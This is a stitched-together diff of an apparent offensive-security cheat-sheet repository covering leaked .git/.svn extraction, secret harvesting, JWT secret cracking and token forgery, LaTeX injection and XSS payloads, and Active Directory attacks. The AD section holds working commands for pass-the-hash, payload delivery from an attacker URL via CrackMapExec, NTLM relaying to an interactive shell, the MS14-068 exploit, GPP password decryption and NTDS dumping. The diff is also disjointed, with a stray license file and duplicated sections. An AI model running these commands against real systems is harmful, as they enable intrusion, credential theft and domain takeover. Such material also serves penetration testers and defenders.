    ```powershell
    wget http://xxx.web.xxx.com/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
    mkdir .git/object/cb
    mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
    git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
    ```
 ### Recovering the content of .git/index
 Use the git index file parser, using python3 https://pypi.python.org/pypi/gin
 ```powershell
 pip3 install gin
 gin ~/git-repo/.git/index
 ```
 Recover name and sha1 hash for each files listed in the index, allowing us to re-use the previous method on the file.
 ```powershell
 $ gin .git/index | egrep -e "name|sha1" 
 name = AWS Amazon Bucket S3/README.md
 sha1 = 862a3e58d138d6809405aa062249487bee074b98
 name = CRLF injection/README.md
 sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
 ```
 ### Automatic way : diggit.py
 ```powershell
 ./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
 ./diggit.py -u http://webpage.com -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1
 -u is remote path, where .git folder exists
 -t is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (cd /path/to/temp/folder && git init)
 -o is a hash of particular Git object to download
 ```
 ### Automatic way : GoGitDumper
 ```powershell
 go get github.com/c-sto/gogitdumper
 gogitdumper -u http://urlhere.com/.git/ -o yourdecideddir/.git/
 git log
 git checkout
 ```
 ### Automatic way : rip-git
 ```powershell
 perl rip-git.pl -v -u "http://edge1.web.*****.com/.git/"
 git cat-file -p 07603070376d63d911f608120eb4b5489b507692  
 tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
 parent 15ca375e54f056a576905b41a417b413c57df6eb
 author Michael <michael@easyctf.com> 1489389105 +0000
 committer Michael <michael@easyctf.com> 1489389105 +0000
 git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
 ```
 ### Automatic way : GitHack
 ```powershell
 git clone https://github.com/lijiejie/GitHack
 GitHack.py http://www.openssl.org/.git/
 ```
 ### Harvesting secrets : trufflehog
 > Searches through git repositories for high entropy strings and secrets, digging deep into commit history
 ```powershell
 pip install truffleHog # https://github.com/dxa4481/truffleHog
 truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git
 ```
 ### Harvesting secrets : Gitrob
 > Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.
 ```powershell
 go get github.com/michenriksen/gitrob # https://github.com/michenriksen/gitrob
 export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
 gitrob [options] target [target2] ... [targetN]
 ```
 ### Harvesting secrets - Gitleaks
 > Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories.
 ```powershell
 # Run gitleaks against a public repository
 docker run --rm --name=gitleaks zricethezav/gitleaks -v -r  https://github.com/zricethezav/gitleaks.git
 # Run gitleaks against a local repository already cloned into /tmp/
 docker run --rm --name=gitleaks -v /tmp/:/code/  zricethezav/gitleaks -v --repo-path=/code/gitleaks
 # Run gitleaks against a specific Github Pull request
 docker run --rm --name=gitleaks -e GITHUB_TOKEN={your token} zricethezav/gitleaks --github-pr=https://github.com/owner/repo/pull/9000
 or
 go get -u github.com/zricethezav/gitleaks
 ```
 ## SVN - Source code management
 ### SVN example (Wordpress)
 ```powershell
 curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
 ```
 1. Download the svn database from http://server/path_to_vulnerable_site/.svn/wc.db
    ```powershell
    INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL);
    ```
 2. Download interesting files
    * remove \$sha1\$ prefix
    * add .svn-base postfix
    * use first two signs from hash as folder name inside pristine/ directory (94 in this case)
    * create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
 ### Automatic way : svn-extractor
 ```powershell
 git clone https://github.com/anantshri/svn-extractor.git
 python svn-extractor.py –url "url with .svn available"
 ```
 ## BAZAAR - Source code management
 ### Automatic way : rip-bzr.pl
 ```powershell
 wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl
 docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-git.pl -v -u  
 ```
 ### Automatic way : bzr_dumper
 ```powershell
 git clone https://github.com/SeahunOh/bzr_dumper
 python3 dumper.py -u "http://127.0.0.1:5000/" -o source
 Created a standalone tree (format: 2a)                                                                                                                                                       
 [!] Target : http://127.0.0.1:5000/
 [+] Start.
 [+] GET repository/pack-names
 [+] GET README
 [+] GET checkout/dirstate
 [+] GET checkout/views
 [+] GET branch/branch.conf
 [+] GET branch/format
 [+] GET branch/last-revision
 [+] GET branch/tag
 [+] GET b'154411f0f33adc3ff8cfb3d34209cbd1'
 [*] Finish
 $ bzr revert
 N  application.py
 N  database.py
 N  static/   
 ```
 ## Leaked API keys
 If you find any key , use the [keyhacks](https://github.com/streaak/keyhacks) from @streaak to verifiy them.
 Twilio example :
 ```powershell
 curl -X GET 'https://api.twilio.com/2010-04-01/Accounts/ACCOUNT_SID/Keys.json' -u ACCOUNT_SID:AUTH_TOKEN
 ```
 ## References
 - [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)
 - [bl4de, diggit](https://github.com/bl4de/security-tools/tree/master/diggit)
 - [Gitrob: Now in Go - Michael Henriksen](https://michenriksen.com/blog/gitrob-now-in-go/)
--- a/management/README.md
+++ b/management/README.md
@@ -1,108 +0,0 @@
 # Insecured source code management
 ## GIT - Source code management
 ### Github example with a .git
 1. Check 403 error (Forbidden) for .git or even better : directory listing
 2. Git saves all informations in log file .git/logs/HEAD (try 'head' too)
    ```powershell
    0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000        clone: from https://github.com/fermayo/hello-world-lamp.git
    15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000        commit: Initial.
    26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000        commit: Whoops! Remove flag.
    6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000        commit: Prevent directory listing.
    ```
 3. Access to the commit based on the hash -> a directory name (first two signs from hash) and filename (rest of it).git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c,
    ```powershell
    # create a .git directory
    git init test
    cd test/.git
    # download the file
    wget http://xxx.web.xxx.com/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
    mkdir .git/object/26
    mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/
    # display the content of the file
    git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
        tree 323240a3983045cdc0dec2e88c1358e7998f2e39
        parent 15ca375e54f056a576905b41a417b413c57df6eb
        author Michael <michael@easyctf.com> 1489390329 +0000
        committer Michael <michael@easyctf.com> 1489390329 +0000
        Initial.
    ```
 4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
    ```powershell
    wget http://xxx.web.xxx.com/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
    mkdir .git/object/32
    mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
    git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
        040000 tree bd083286051cd869ee6485a3046b9935fbd127c0        css
        100644 blob cb6139863967a752f3402b3975e97a84d152fd8f        flag.txt
        040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97        fonts
        100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1        index.html
        040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8        js
    ```
 5. Read the data (flag.txt)
    ```powershell
    wget http://xxx.web.xxx.com/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
    mkdir .git/object/cb
    mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
    git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
    ```
 ### Automatic way : diggit.py
 ```powershell
 ./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
 ./diggit.py -u http://webpage.com -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1
 -u is remote path, where .git folder exists
 -t is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (cd /path/to/temp/folder && git init)
 -o is a hash of particular Git object to download
 ```
 ### Alternative way : rip-git
 ```powershell
 perl rip-git.pl -v -u "http://edge1.web.*****.com/.git/"
 git cat-file -p 07603070376d63d911f608120eb4b5489b507692  
 tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
 parent 15ca375e54f056a576905b41a417b413c57df6eb
 author Michael <michael@easyctf.com> 1489389105 +0000
 committer Michael <michael@easyctf.com> 1489389105 +0000
 git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
 ```
 ## SVN - Source code management
 ### SVN example (Wordpress)
 ```powershell
 curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
 ```
 1. Download the svn database from http://server/path_to_vulnerable_site/.svn/wc.db
    ```powershell
    INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL);
    ```
 2. Download interesting files
    * remove \$sha1\$ prefix
    * add .svn-base postfix
    * use first two signs from hash as folder name inside pristine/ directory (94 in this case)
    * create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
 ### Automatic way
 ```powershell
 git clone https://github.com/anantshri/svn-extractor.git
 python svn-extractor.py –url "url with .svn available"
 ```
 ## Thanks to
 * bl4de, https://github.com/bl4de/research/tree/master/hidden_directories_leaks
 * bl4de, https://github.com/bl4de/security-tools/tree/master/diggit
--- a/Token/README.md
+++ b/Token/README.md
@@ -2,16 +2,37 @@
 > JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed.
 ## Summary 
 - JWT Format
 - JWT Signature - None algorithm
 - JWT Signature - RS256 to HS256
 - Breaking JWT's secret
 ## Tools
 - [jwt_tool](https://github.com/ticarpi/jwt_tool)
 - [c-jwt-cracker](https://github.com/brendan-rius/c-jwt-cracker)
 - [JOSEPH - JavaScript Object Signing and Encryption Pentesting Helper](https://portswigger.net/bappstore/82d6c60490b540369d6d5d01822bdf61)
 ## JWT Format
 JSON Web Token : `Base64(Header).Base64(Data).Base64(Signature)`
 Example : `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkFtYXppbmcgSGF4eDByIiwiZXhwIjoiMTQ2NjI3MDcyMiIsImFkbWluIjp0cnVlfQ.UL9Pz5HbaMdZCV9cS9OcpccjrlkcmLovL2A2aiKiAOY`
 Where we can split it into 3 components separated by a dot.
 ```powershell
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9        # header
 eyJzdWIiOiIxMjM0[...]kbWluIjp0cnVlfQ        # payload
 UL9Pz5HbaMdZCV9cS9OcpccjrlkcmLovL2A2aiKiAOY # signature
 ```
 ### Header
 Default algorithm is "HS256" (HMAC SHA256 symmetric encryption).
-"RS256" is used for asymetric purposes (RSA asymmetric encryption and private key signature).
+"RS256" is used for asymmetric purposes (RSA asymmetric encryption and private key signature).
 ```json
 {
@@ -31,6 +52,15 @@ Default algorithm is "HS256" (HMAC SHA256 symmetric encryption).
 }
 ```
 Claims are the predefined keys and their values:
 - iss: issuer of the token
 - exp: the expiration timestamp (reject tokens which have expired). Note: as defined in the spec, this must be in seconds.
 - iat: The time the JWT was issued. Can be used to determine the age of the JWT
 - nbf: "not before" is a future time when the token will become active.
 - jti: unique identifier for the JWT. Used to prevent the JWT from being re-used or replayed.
 - sub: subject of the token (rarely used)
 - aud: audience of the token (also rarely used)
 JWT Encoder – Decoder: `http://jsonwebtoken.io`
 ## JWT Signature - None algorithm
@@ -109,9 +139,66 @@ jwt.decode(encoded, 'Sn1f', algorithms=['HS256']) # decode with 'Sn1f' as the se
 ### JWT tool
-```bash
+First, bruteforce the "secret" key used to compute the signature.
 ```powershell
 git clone https://github.com/ticarpi/jwt_tool
-python jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw /usr/share/wordlists/rockyou.txt
+python2.7 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6InVzZXIiLCJpYXQiOjE1MTYyMzkwMjJ9.1rtMXfvHSjWuH6vXBCaLLJiBghzVrLJpAQ6Dl5qD4YI /tmp/wordlist
 Token header values:
 [+] alg = HS256
 [+] typ = JWT
 Token payload values:
 [+] sub = 1234567890
 [+] role = user
 [+] iat = 1516239022
 File loaded: /tmp/wordlist
 Testing 5 passwords...
 [+] secret is the CORRECT key!
 ```
 Then edit the field inside the JSON Web Token.
 ```powershell
 Current value of role is: user
 Please enter new value and hit ENTER
 > admin
 [1] sub = 1234567890
 [2] role = admin
 [3] iat = 1516239022
 [0] Continue to next step
 Please select a field number:
 (or 0 to Continue)
 > 0
 ```
 Finally, finish the token by signing it with the previously retrieved "secret" key.
 ```powershell
 Token Signing:
 [1] Sign token with known key
 [2] Strip signature from token vulnerable to CVE-2015-2951
 [3] Sign with Public Key bypass vulnerability
 [4] Sign token with key file
 Please select an option from above (1-4):
 > 1
 Please enter the known key:
 > secret
 Please enter the keylength:
 [1] HMAC-SHA256
 [2] HMAC-SHA384
 [3] HMAC-SHA512
 > 1
 Your new forged token:
 [+] URL safe: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.xbUXlOQClkhXEreWmB3da_xtBsT0Kjw7truyhDwF5Ic
 [+] Standard: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.xbUXlOQClkhXEreWmB3da/xtBsT0Kjw7truyhDwF5Ic
 ```
 ### JWT cracker
@@ -131,7 +218,7 @@ Secret is "Sn1f"
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
 ```
-## Thanks
+## References
 - [Hacking JSON Web Token (JWT) - Hate_401](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6)
 - [WebSec CTF - Authorization Token - JWT Challenge](https://ctf.rip/websec-ctf-authorization-token-jwt-challenge/)
@@ -139,3 +226,9 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
 - [5 Easy Steps to Understanding JSON Web Token](https://medium.com/vandium-software/5-easy-steps-to-understanding-json-web-tokens-jwt-1164c0adfcec)
 - [Hacking JSON Web Tokens - From Zero To Hero Without Effort - Websecurify Blog](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
 - [HITBGSEC CTF 2017 - Pasty (Web) - amon (j.heng)](https://nandynarwhals.org/hitbgsec2017-pasty/)
 - [Critical vulnerabilities in JSON Web Token libraries - March 31, 2015 - Tim McLean](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries//)
 - [Learn how to use JSON Web Tokens (JWT) for Authentication - @dwylhq](https://github.com/dwyl/learn-json-web-tokens)
 - [Simple JWT hacking - @b1ack_h00d](https://medium.com/@blackhood/simple-jwt-hacking-73870a976750)
 - [Attacking JWT authentication - Sep 28, 2016 - Sjoerd Langkemper](https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/)
 - [How to Hack a Weak JWT Implementation with a Timing Attack - Jan 7, 2017 - Tamas Polgar](https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9)
 - [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
--- a/injection/Intruders/LDAP_FUZZ.txt
+++ b/injection/Intruders/LDAP_FUZZ.txt
--- a/injection/Intruders/LDAP_attributes.txt
+++ b/injection/Intruders/LDAP_attributes.txt
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -96,7 +96,7 @@ userPassword:2.5.13.18:=\xx\xx
 userPassword:2.5.13.18:=\xx\xx\xx
 ```
-## Thanks to
+## References
 * [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection)
 * [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/)
--- a/21
+++ b/21
@@ -0,0 +1,21 @@
 MIT License
 Copyright (c) 2019 Swissky
 Permission is hereby granted, free of charge, to any person obtaining a copy
 of this software and associated documentation files (the "Software"), to deal
 in the Software without restriction, including without limitation the rights
 to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 copies of the Software, and to permit persons to whom the Software is
 furnished to do so, subject to the following conditions:
 The above copyright notice and this permission notice shall be included in all
 copies or substantial portions of the Software.
 THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
 SOFTWARE.
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -66,7 +66,17 @@ If you get any LaTex error, consider using base64 to get the result without bad
 \input{|"/bin/hostname"}
 ```
-## Thanks to
+## Cross Site Scripting
 From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130) 
 ```bash
 \url{javascript:alert(1)}
 \href{javascript:alert(1)}{placeholder}
 ```
 Live example at `http://payontriage.com/xss.php?xss=$\href{javascript:alert(1)}{Frogs%20find%20bugs}$`
 ## References
 * [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)
 * [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
--- a/Resources/Active
+++ b/Resources/Active
@@ -13,15 +13,15 @@
  * [Silver Tickets](#passtheticket-silver-tickets)
  * [Trust Tickets](#trust-tickets)
  * [Kerberoast](#kerberoast)
  * [KRB_AS_REP roasting](#krb_as_rep-roasting)
  * [Pass-the-Hash](#pass-the-hash)
  * [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
  * [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes)
  * [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying)
  * [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
  * [Trust relationship between domains](#trust-relationship-between-domains)
-* [Privilege Escalation](#privilege-escalation)
+  * [PrivExchange attack](#privexchange-attack)
-  * [PrivEsc Local Admin - Token Impersonation (RottenPotato)](#privesc-local-admin---token-impersonation-rottenpotato)
+  * [Password spraying](#password-spraying)
  * [PrivEsc Local Admin - MS16-032](#privesc-local-admin---ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64)
  * [PrivEsc Local Admin - MS17-010 (Eternal Blue)](#privesc-local-admin---ms17-010-eternal-blue)
  * [From Local Admin to Domain Admin](#from-local-admin-to-domain-admin)
 ## Tools
@@ -37,8 +37,11 @@
  Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
  ./bloodhound
  SharpHound.exe (from resources/Ingestor)
  SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100
  or 
  Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
  or 
  bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all
  ```
 * [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer)
@@ -48,11 +51,25 @@
  git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
  crackmapexec smb -L
  crackmapexec smb -M name_module -o VAR=DATA
  crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --local-auth
  crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares
  crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
  crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
  crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
  crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
  crackmapexec mimikatz --server http --server-port 80
  ```
 * [Mitm6](https://github.com/fox-it/mitm6.git)
  ```bash
  git clone https://github.com/fox-it/mitm6.git && cd mitm6
  pip install .
  mitm6 -d lab.local
  ntlmrelayx.py -wh 192.168.218.129 -t smb://192.168.218.128/ -i
  # -wh: Server hosting WPAD file (Attacker’s IP)
  # -t: Target (You cannot relay credentials to the same device that you’re spoofing)
  # -i: open an interactive shell
  ```
 * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
@@ -64,31 +81,135 @@
 * [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script)
    ```powershell
    powershell.exe -ExecutionPolicy Bypass ./ADAPE.ps1 
    ```
 * [Ping Castle](https://github.com/vletoux/pingcastle)
    ```powershell
    pingcastle.exe --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD> --advanced-live --nullsession
    ```
 * [Kerbrute](https://github.com/ropnop/kerbrute)
    ```powershell
    ./kerbrute passwordspray -d <DOMAIN> <USERS.TXT> <PASSWORD>
    ```
 ## Most common paths to AD compromise
 ### MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)
-```bash
+This exploit require to know the user SID, you can use `rpcclient` to remotely get it or `wmi` if you have an access on the machine.
 Exploit Python: https://www.exploit-db.com/exploits/35474/
 Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
 Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
-git clone https://github.com/bidord/pykek
+```powershell
 # remote
 rpcclient $> lookupnames john.smith
 john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)
 # loc
 wmic useraccount get name,sid
 Administrator  S-1-5-21-3415849876-833628785-5197346142-500   
 Guest          S-1-5-21-3415849876-833628785-5197346142-501   
 Administrator  S-1-5-21-297520375-2634728305-5197346142-500   
 Guest          S-1-5-21-297520375-2634728305-5197346142-501   
 krbtgt         S-1-5-21-297520375-2634728305-5197346142-502   
 lambda         S-1-5-21-297520375-2634728305-5197346142-1110 
 ```
 ```bash
 Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
 ```
 Generate a ticket with `metasploit` or `pykek`
 ```powershell
 Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
   Name      Current Setting                                Required  Description
   ----      ---------------                                --------  -----------
   DOMAIN    LABDOMAIN.LOCAL                                yes       The Domain (upper case) Ex: DEMO.LOCAL
   PASSWORD  P@ssw0rd                                       yes       The Domain User password
   RHOSTS    10.10.10.10                                    yes       The target address range or CIDR identifier
   RPORT     88                                             yes       The target port
   Timeout   10                                             yes       The TCP timeout to establish connection and read data
   USER      lambda                                         yes       The Domain User
   USER_SID  S-1-5-21-297520375-2634728305-5197346142-1106  yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
 ```
 ```powershell
 # https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek
 git clone https://github.com/SecWiki/windows-kernel-exploits
 python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
 python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
 python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10
 ```
 Then use `mimikatz` to load the ticket.
 ```powershell
 mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
 ```
-## Open Shares
+:warning: If the clock is skewed use `clock-skew.nse` script from `nmap`
 ```powershell
 $ nmap -sV -sC 10.10.10.10
 clock-skew: mean: -1998d09h03m04s, deviation: 4h00m00s, median: -1998d11h03m05s
 $ sudo date -s "14 APR 2015 18:25:16" 
 ```
 ### Open Shares
 ```powershell
 smbmap -H 10.10.10.10                # null session
 smbmap -H 10.10.10.10 -R             # recursive listing
 smbmap -H 10.10.10.10 -u invaliduser # guest smb session
 smbmap -H 10.10.10.10 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
 ```
 or 
 ```powershell
 pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
-ls # list files
+pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$
-cd 
+ls  # list files
 cd  # move inside a folder
 get # download files
 put # replace a file
 ```
 or 
 ```powershell
 smbclient -I 10.10.10.100 -L ACTIVE -N -U ""
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Replication     Disk      
        SYSVOL          Disk      Logon server share
        Users           Disk
 use Sharename # select a Sharename
 cd Folder     # move inside a folder
 ls            # list files
 ```
 Download a folder recursively
 ```powershell
 smbclient //10.0.0.1/Share
 smb: \> mask ""
 smb: \> recurse ON
 smb: \> prompt OFF
 smb: \> lcd '/path/to/go/'
 smb: \> mget *
 ```
 Mount a share
 ```powershell
@@ -99,18 +220,21 @@ smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
 :triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
-Find password in SYSVOL
+Find password in SYSVOL (MS14-025)
 ```powershell
 findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
 ```
-Decrypt a Group Policy Password found in SYSVOL (by [0x00C651E0](https://twitter.com/0x00C651E0/status/956362334682849280))
+Decrypt a Group Policy Password found in SYSVOL (by [0x00C651E0](https://twitter.com/0x00C651E0/status/956362334682849280)), using the 32-byte AES key provided by Microsoft in the [MSDN - 2.2.1.1.4 Password Encryption](https://msdn.microsoft.com/en-us/library/cc422924.aspx)
 ```bash
 echo 'password_in_base64' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
-e.g: echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
+e.g: 
 echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
 echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
 ```
 Metasploit modules to enumerate shares and credentials
@@ -152,6 +276,12 @@ ifm: quit
 ntdsutil: quit
 ```
 or 
 ```powershell
 ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
 ```
 #### Using Vshadow
 ```powershell
@@ -235,6 +365,13 @@ cme smb 10.10.0.202 -u username -p password --ntds vss
 enum4linux | grep -i desc
 There are 3-4 fields that seem to be common in most AD schemas: 
 UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
 Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID
 ```
 or dump the Active Directory and `grep` the content.
 ```powershell
